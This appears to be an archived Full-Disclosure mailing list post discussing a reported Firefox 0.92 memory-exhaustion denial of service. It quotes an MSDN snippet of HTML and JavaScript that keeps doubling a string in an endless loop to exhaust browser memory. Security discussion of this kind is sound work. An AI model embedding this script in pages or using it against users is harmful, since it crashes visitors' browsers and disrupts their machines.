lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY9-DAV11qgwCDXldB0008d385@hotmail.com> From: se_cur_ity at hotmail.com (morning_wood) Subject: AW: Firefox 0.92 DoS via TinyBMP it seems to just be loading a bunch of data ( 1851MB ) via images to consume memory. the same effect can be accomplished here... http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp ---------- snip ---------- Such memory protection systems aren't foolproof. Even for normal memory and non-ActiveX controls, this script fragment will bring most browsers quickly to their knees (don't try this unless you're willing to re-boot): <HTML><BODY><SCRIPT> var big_string = "double me up!"; while (true) { big_string = big_string + big_string; // 20 iterations equals all your memory... } </SCRIPT></BODY></HTML> ---------- snip ---------- or not m.wood